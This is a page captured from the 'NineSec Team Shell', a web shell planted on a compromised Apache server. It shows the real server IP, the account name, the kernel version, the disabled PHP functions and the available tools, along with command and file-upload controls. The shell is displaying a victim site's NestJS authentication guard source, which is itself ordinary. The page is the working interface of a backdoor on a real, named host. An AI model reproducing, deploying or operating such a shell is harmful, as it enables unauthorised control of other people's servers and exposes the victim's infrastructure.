NineSec Team Shell
Server IP : 92.205.26.207  /  Your IP : 216.73.216.16
Web Server : Apache
System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64
User : zikryat ( 1002)
PHP Version : 8.3.23
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/zikryat/public_html/dist/src/core/guards/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/zikryat/public_html/dist/src/core/guards/verified.auth.guard.js
"use strict";
var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) {
    var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;
    if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc);
    else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;
    return c > 3 && r && Object.defineProperty(target, key, r), r;
};
var __metadata = (this && this.__metadata) || function (k, v) {
    if (typeof Reflect === "object" && typeof Reflect.metadata === "function") return Reflect.metadata(k, v);
};
Object.defineProperty(exports, "__esModule", { value: true });
exports.VerifiedAuthGuard = void 0;
const common_1 = require("@nestjs/common");
const auth_service_1 = require("../../api/auth/auth.service");
let VerifiedAuthGuard = class VerifiedAuthGuard {
    constructor(authService) {
        this.authService = authService;
    }
    async canActivate(context) {
        const request = context.switchToHttp().getRequest();
        const authorization = request.headers["authorization"] || request.headers["Authorization"];
        if (!authorization)
            throw new common_1.BadRequestException("authorization key in headers is required");
        if (!authorization.toString().includes("Bearer"))
            throw new common_1.BadRequestException("authorization key in headers is must start with Bearer");
        let token = authorization.split("Bearer ")[1];
        if (!token)
            throw new common_1.BadRequestException("Token after Bearer\" \"must be starting ");
        request.user = await this.authService.getVerifiedUser(token);
        return true;
    }
};
VerifiedAuthGuard = __decorate([
    (0, common_1.Injectable)(),
    __metadata("design:paramtypes", [auth_service_1.AuthService])
], VerifiedAuthGuard);
exports.VerifiedAuthGuard = VerifiedAuthGuard;
//# sourceMappingURL=verified.auth.guard.js.map

NineSec Team - 2022